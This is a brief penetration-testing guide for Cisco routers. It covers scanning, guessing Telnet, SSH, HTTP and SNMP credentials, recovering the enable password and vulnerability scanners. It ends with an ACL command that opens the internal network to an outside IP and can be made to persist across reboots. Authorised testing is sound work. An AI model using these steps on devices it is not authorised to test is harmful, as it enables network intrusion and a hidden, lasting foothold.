- Introduction to CISCO penetration testing
- Scan & Fingerprint
The purpose of 'Scan & Fingerprint' is to identify
open ports on the target device and attempt to determine the exact IOS version.
This then sets the plan for further attacks.
It Telnet is active, then
password guessing attacks should be performed.
If SNMP is active, then
community string guessing should be performed.
- Credentials Guessing
If a network engineer/administrator has configured just
one Cisco device with a poor password, then the whole network is open to attack.
Attempting to connect with various usernames/passwords is a mandatory step to
testing the level of security that the device offers.
Attempt to guess
Telnet, HTTP and SSH account credentials.
Once you have non-privileged
access, attempt to discover the 'enable' password.
Also attempt to guess
Simple Network Management Protocol (SNMP) community strings as they can lead to
the config files of the router and therefore the 'enable'
password!
- Connect
Once you have identified the access credentials, whether
that be HTTP, Telnet or SSH, then connect to the target device to identify
further information.
If you have determined the 'enable' password, then
full access has been achieved and you can alter the configuration files of the
router.
- Vulnerability Assessment
To check for known bugs, vulnerabilities or security
flaws with the device, a good security scanner can be used.
Nessus3 is
pretty good for this although there are many other alternatives such
as:
Retina
GFI LanGuard
Core Impact
There are also tools that
check for specific flaws, such as the HTTP Arbitrary Access
Bug:
ios-w3-vuln
- Further your attack
To further the attack into the target network, some
changes need to be made to the running-config file of the target
device.
There are two main categories for configuration files with Cisco
routers - running-config and startup-confg.
running-config is the
currently running configuration settings. This gets loaded from the
startup-config on boot. This configuration file is editable and the changes are
immediate. Any changes will be lost once the router is rebooted. It is this file
that requires altering to maintain a non-permenant connection through to the
internal network.
startup-config is the boot up configuration file. It is
this file that needs altering to maintain a permenant connection through to the
internal network.
Once you have access to the config files, you will need
enable (privileged mode) access for this, you can add an access list rule to
allow your IP address into the internal network.
The following ACL
will allow the defined <IP> access to any internal IP address.
#>
access-list 100 permit ip <IP> any
So if the router is protecting a
web server and an email server, this ACL will allow you to pass packets to those
IP addresses on any port. Therefore you should be able to port scan them
efficiently.
- CISCO Command Reference
